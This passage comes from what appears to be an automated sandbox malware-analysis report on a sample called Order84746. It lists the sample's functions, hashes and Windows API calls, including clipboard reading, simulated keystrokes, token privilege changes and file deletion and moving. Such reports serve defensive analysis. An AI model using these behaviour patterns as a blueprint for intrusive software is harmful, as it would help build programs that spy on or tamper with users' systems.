                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID:
                          • API String ID: 1473721057-0
                          • Opcode ID: eb87c221d434b70a3996d97cb1eae4f3720108754134861d8cba16bfec0f82c7
                          • Instruction ID: 04ea0e460ac6de0b358c95773b27f9dc90524646bf5a9787e26b2e7e169c6c5c
                          • Opcode Fuzzy Hash: eb87c221d434b70a3996d97cb1eae4f3720108754134861d8cba16bfec0f82c7
                          • Instruction Fuzzy Hash: FE210A70508619CFDB24DF69C444A2ABBE1FF89308F154A6CEA9687262D731E845CF52
                          APIs
                          • ___lock_fhandle.LIBCMT ref: 0090AFC0
                            • Part of subcall function 00907BDA: __getptd_noexit.LIBCMT ref: 00907BDA
                            • Part of subcall function 00907C0E: __getptd_noexit.LIBCMT ref: 00907C0E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __getptd_noexit$___lock_fhandle
                          • String ID:
                          • API String ID: 1144279405-0
                          • Opcode ID: c4707881b0e03dda8e358f96908627d4f94d6c46476e2bdec4398832f6255a58
                          • Instruction ID: 132a2beb42709c2b5846200f82fa87d96d12c514f992d674024d747a488e78aa
                          • Opcode Fuzzy Hash: c4707881b0e03dda8e358f96908627d4f94d6c46476e2bdec4398832f6255a58
                          • Instruction Fuzzy Hash: 231191729096109FE7127FA4C84276E7B74AFC2331F264640E4741F2E2D7B99D109BE1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                          • Instruction ID: 304fe1019149d4ed1f5b3aeced8a482601522affa2b422a66498cbcaffb96aff
                          • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                          • Instruction Fuzzy Hash: 1501497150014DAFCF05EFA5C8918FEBB78FF12344F108025B956D7195EA309A49DF61
                          APIs
                          • __lock_file.LIBCMT ref: 00902AED
                            • Part of subcall function 00907C0E: __getptd_noexit.LIBCMT ref: 00907C0E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __getptd_noexit__lock_file
                          • String ID:
                          • API String ID: 2597487223-0
                          • Opcode ID: de52e6f6bb86d9507d57708d85a8820076ba678a9f220423e602c6859d21cd27
                          • Instruction ID: db4926fecdc06335bc62f2a477f01ac6b361971681d6b98cf96db1a340756e27
                          • Opcode Fuzzy Hash: de52e6f6bb86d9507d57708d85a8820076ba678a9f220423e602c6859d21cd27
                          • Instruction Fuzzy Hash: 31F06D31A00205EEDF21AFA9CC0A79F7AA9BF80320F158415B4149A1E1DB788A62DB91
                          APIs
                          • FreeLibrary.KERNEL32(?,?,?,?,?,008E39FE,?,00000001), ref: 008E4286
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 710bfb0e217843dde461c93872237af5a3ec2694fd769cc537dd1b07dd30d717
                          • Instruction ID: 8be2f39ccf00f260706d381c2b22b9164a1bfa763280448b63995b97884f1199
                          • Opcode Fuzzy Hash: 710bfb0e217843dde461c93872237af5a3ec2694fd769cc537dd1b07dd30d717
                          • Instruction Fuzzy Hash: F9F0A070509341CFCB348F62D884812B7E5FF063193209A7EF2DAC2510C3719840DF40
                          APIs
                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008E40C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: LongNamePath
                          • String ID:
                          • API String ID: 82841172-0
                          • Opcode ID: b3782463264da5beebb89a0f218ac7ef43c13cf99bf59a3146dccf2fdfca97eb
                          • Instruction ID: ca8641b902de540fa157d21b69b387e93fbf80a9b20c537637821bb8243cfa21
                          • Opcode Fuzzy Hash: b3782463264da5beebb89a0f218ac7ef43c13cf99bf59a3146dccf2fdfca97eb
                          • Instruction Fuzzy Hash: 97E07D32A001241BC7119258CC42FEE339CDFC8790F050074F905D3244D9A0A9808690
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __fread_nolock
                          • String ID:
                          • API String ID: 2638373210-0
                          • Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                          • Instruction ID: b7c0a1789265cd30186cb1341fe87acb21377e7998d49ac8c409451c24115caa
                          • Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                          • Instruction Fuzzy Hash: BBE092B0104B009FD7348A24D810BE373E8EB05305F00085CF6AA83282EB627841C759
                          APIs
                          • Sleep.KERNELBASE(000001F4), ref: 011DAEE9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1678053935.00000000011D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 011D8000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_11d8000_Order84746.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                          • Instruction ID: 6534f562a7f7986fcb9d4f5e12115754e5193810c5111df6a40b9a26ccc147b3
                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                          • Instruction Fuzzy Hash: 92E0E67498410DDFDB00DFB4D54969D7BB4EF04302F1001A1FD01D2280D7309D508A66
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                          • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 0094F87D
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0094F8DC
                          • GetWindowLongW.USER32(?,000000F0), ref: 0094F919
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0094F940
                          • SendMessageW.USER32 ref: 0094F966
                          • _wcsncpy.LIBCMT ref: 0094F9D2
                          • GetKeyState.USER32(00000011), ref: 0094F9F3
                          • GetKeyState.USER32(00000009), ref: 0094FA00
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0094FA16
                          • GetKeyState.USER32(00000010), ref: 0094FA20
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0094FA4F
                          • SendMessageW.USER32 ref: 0094FA72
                          • SendMessageW.USER32(?,00001030,?,0094E059), ref: 0094FB6F
                          • SetCapture.USER32(?), ref: 0094FB9F
                          • ClientToScreen.USER32(?,?), ref: 0094FC03
                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0094FC29
                          • ReleaseCapture.USER32 ref: 0094FC34
                          • GetCursorPos.USER32(?), ref: 0094FC69
                          • ScreenToClient.USER32(?,?), ref: 0094FC76
                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0094FCD8
                          • SendMessageW.USER32 ref: 0094FD02
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0094FD41
                          • SendMessageW.USER32 ref: 0094FD6C
                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0094FD84
                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0094FD8F
                          • GetCursorPos.USER32(?), ref: 0094FDB0
                          • ScreenToClient.USER32(?,?), ref: 0094FDBD
                          • GetParent.USER32(?), ref: 0094FDD9
                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0094FE3F
                          • SendMessageW.USER32 ref: 0094FE6F
                          • ClientToScreen.USER32(?,?), ref: 0094FEC5
                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0094FEF1
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0094FF19
                          • SendMessageW.USER32 ref: 0094FF3C
                          • ClientToScreen.USER32(?,?), ref: 0094FF86
                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0094FFB6
                          • GetWindowLongW.USER32(?,000000F0), ref: 0095004B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                          • String ID: @GUI_DRAGID$F
                          • API String ID: 3461372671-4164748364
                          • Opcode ID: 1fffb46f8e6d9b0e98c78ae1826689d2ebcab3b7ad083a7a3182d4a11f967c09
                          • Instruction ID: 9f3f6995a420822091afd4c89a47a06e684ff23a9c81f37169f2c5ab9802b3b2
                          • Opcode Fuzzy Hash: 1fffb46f8e6d9b0e98c78ae1826689d2ebcab3b7ad083a7a3182d4a11f967c09
                          • Instruction Fuzzy Hash: 5332AC70608246AFDB10CF68CC94FAABBE8FF49354F140A29F6568B2A1D771DC04DB51
                          APIs
                          • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0094B1CD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: %d/%02d/%02d
                          • API String ID: 3850602802-328681919
                          • Opcode ID: e6ba38386e33d92263fda2652b2565442b2144cd0526ed74054647f5eb104aeb
                          • Instruction ID: 6c751f080487cfe925b317724bad0cae59c28474f1e1f0a84daccd7699e7e33a
                          • Opcode Fuzzy Hash: e6ba38386e33d92263fda2652b2565442b2144cd0526ed74054647f5eb104aeb
                          • Instruction Fuzzy Hash: 0012D071A54208ABEB248F69CC49FAE7BB8FF49310F104159FA16DB2D1DBB4D941CB21
                          APIs
                          • GetForegroundWindow.USER32(00000000,00000000), ref: 008FEB4A
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00953AEA
                          • IsIconic.USER32(000000FF), ref: 00953AF3
                          • ShowWindow.USER32(000000FF,00000009), ref: 00953B00
                          • SetForegroundWindow.USER32(000000FF), ref: 00953B0A
                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00953B20
                          • GetCurrentThreadId.KERNEL32 ref: 00953B27
                          • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00953B33
                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00953B44
                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00953B4C
                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 00953B54
                          • SetForegroundWindow.USER32(000000FF), ref: 00953B57
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00953B6C
                          • keybd_event.USER32(00000012,00000000), ref: 00953B77
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00953B81
                          • keybd_event.USER32(00000012,00000000), ref: 00953B86
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00953B8F
                          • keybd_event.USER32(00000012,00000000), ref: 00953B94
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00953B9E
                          • keybd_event.USER32(00000012,00000000), ref: 00953BA3
                          • SetForegroundWindow.USER32(000000FF), ref: 00953BA6
                          • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00953BCD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                          • String ID: Shell_TrayWnd
                          • API String ID: 4125248594-2988720461
                          • Opcode ID: 0db82c3497eaee07b4aa56071777aa4da2a8420610f64dd3137e27943eb08d0e
                          • Instruction ID: 0164b2388e9f30b2d5ce8ea8f2016b9abee95447f0de6f937fabade7174407bd
                          • Opcode Fuzzy Hash: 0db82c3497eaee07b4aa56071777aa4da2a8420610f64dd3137e27943eb08d0e
                          • Instruction Fuzzy Hash: D03163B1B542187BEB205B668C49F7F7F6CEB44B91F108029FA05EA1D0D6F15D00BBA1
                          APIs
                            • Part of subcall function 0091B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0091B180
                            • Part of subcall function 0091B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0091B1AD
                            • Part of subcall function 0091B134: GetLastError.KERNEL32 ref: 0091B1BA
                          • _memset.LIBCMT ref: 0091AD08
                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0091AD5A
                          • CloseHandle.KERNEL32(?), ref: 0091AD6B
                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0091AD82
                          • GetProcessWindowStation.USER32 ref: 0091AD9B
                          • SetProcessWindowStation.USER32(00000000), ref: 0091ADA5
                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0091ADBF
                            • Part of subcall function 0091AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0091ACC0), ref: 0091AB99
                            • Part of subcall function 0091AB84: CloseHandle.KERNEL32(?,?,0091ACC0), ref: 0091ABAB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                          • String ID: $default$winsta0$winsta0\default
                          • API String ID: 2063423040-1685893292
                          • Opcode ID: 9202b89aa997ee50ffe4d1ff337a40092f7e58c6b4c6b468c97aa41f0949209c
                          • Instruction ID: 934839c49302bad077cf61f2beb3c964daf013a98a3fefadea360e21932c8c57
                          • Opcode Fuzzy Hash: 9202b89aa997ee50ffe4d1ff337a40092f7e58c6b4c6b468c97aa41f0949209c
                          • Instruction Fuzzy Hash: E8818DB1A0220DAFEF119FA4DC45AEE7BBDFF08304F044119F924A61A1D7718E95DB62
                          APIs
                            • Part of subcall function 00926EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00925FA6,?), ref: 00926ED8
                            • Part of subcall function 00926EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00925FA6,?), ref: 00926EF1
                            • Part of subcall function 0092725E: __wsplitpath.LIBCMT ref: 0092727B
                            • Part of subcall function 0092725E: __wsplitpath.LIBCMT ref: 0092728E
                            • Part of subcall function 009272CB: GetFileAttributesW.KERNEL32(?,00926019), ref: 009272CC
                          • _wcscat.LIBCMT ref: 00926149
                          • _wcscat.LIBCMT ref: 00926167
                          • __wsplitpath.LIBCMT ref: 0092618E
                          • FindFirstFileW.KERNEL32(?,?), ref: 009261A4
                          • _wcscpy.LIBCMT ref: 00926209
                          • _wcscat.LIBCMT ref: 0092621C
                          • _wcscat.LIBCMT ref: 0092622F
                          • lstrcmpiW.KERNEL32(?,?), ref: 0092625D
                          • DeleteFileW.KERNEL32(?), ref: 0092626E
                          • MoveFileW.KERNEL32(?,?), ref: 00926289
                          • MoveFileW.KERNEL32(?,?), ref: 00926298
                          • CopyFileW.KERNEL32(?,?,00000000), ref: 009262AD
                          • DeleteFileW.KERNEL32(?), ref: 009262BE
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 009262E1
                          • FindClose.KERNEL32(00000000), ref: 009262FD
                          • FindClose.KERNEL32(00000000), ref: 0092630B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                          • String ID: \*.*
                          • API String ID: 1917200108-1173974218
                          • Opcode ID: a751035f3a97dea39f82098d192664cfa570f1f83f913e7dda6dc13582b526e9
                          • Instruction ID: 3ff575e72b66a41943bf3f042108d405c9b527f4f241a16e16d0051c0f3661a2
                          • Opcode Fuzzy Hash: a751035f3a97dea39f82098d192664cfa570f1f83f913e7dda6dc13582b526e9
                          • Instruction Fuzzy Hash: 8C515072D0912CAACB21EB91DC44EEF77BCAF45300F0500EAE595E3145DE76A7498FA4
                          APIs
                          • OpenClipboard.USER32(0097DC00), ref: 00936B36
                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00936B44
                          • GetClipboardData.USER32(0000000D), ref: 00936B4C
                          • CloseClipboard.USER32 ref: 00936B58
                          • GlobalLock.KERNEL32(00000000), ref: 00936B74
                          • CloseClipboard.USER32 ref: 00936B7E
                          • GlobalUnlock.KERNEL32(00000000), ref: 00936B93
                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00936BA0
                          • GetClipboardData.USER32(00000001), ref: 00936BA8
                          • GlobalLock.KERNEL32(00000000), ref: 00936BB5
                          • GlobalUnlock.KERNEL32(00000000), ref: 00936BE9
                          • CloseClipboard.USER32 ref: 00936CF6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                          • String ID:
                          • API String ID: 3222323430-0
                          • Opcode ID: a6e603fe8c0304e9b6e9ef10d64b891ece9765332eda72567605b5d9983d5757
                          • Instruction ID: 6c1495aaf89012ed13deea68730038fa7cbd575200388919d798ebe31ed2ae65
                          • Opcode Fuzzy Hash: a6e603fe8c0304e9b6e9ef10d64b891ece9765332eda72567605b5d9983d5757
                          • Instruction Fuzzy Hash: A3518B71708201ABD300AB69DD96F6E77A8EF89B11F00442DF6A6D61E1DFA0D8059F62
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 0092F62B
                          • FindClose.KERNEL32(00000000), ref: 0092F67F
                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0092F6A4
                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0092F6BB
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0092F6E2
                          • __swprintf.LIBCMT ref: 0092F72E
                          • __swprintf.LIBCMT ref: 0092F767
                          • __swprintf.LIBCMT ref: 0092F7BB
                            • Part of subcall function 0090172B: __woutput_l.LIBCMT ref: 00901784
                          • __swprintf.LIBCMT ref: 0092F809
                          • __swprintf.LIBCMT ref: 0092F858
                          • __swprintf.LIBCMT ref: 0092F8A7
                          • __swprintf.LIBCMT ref: 0092F8F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
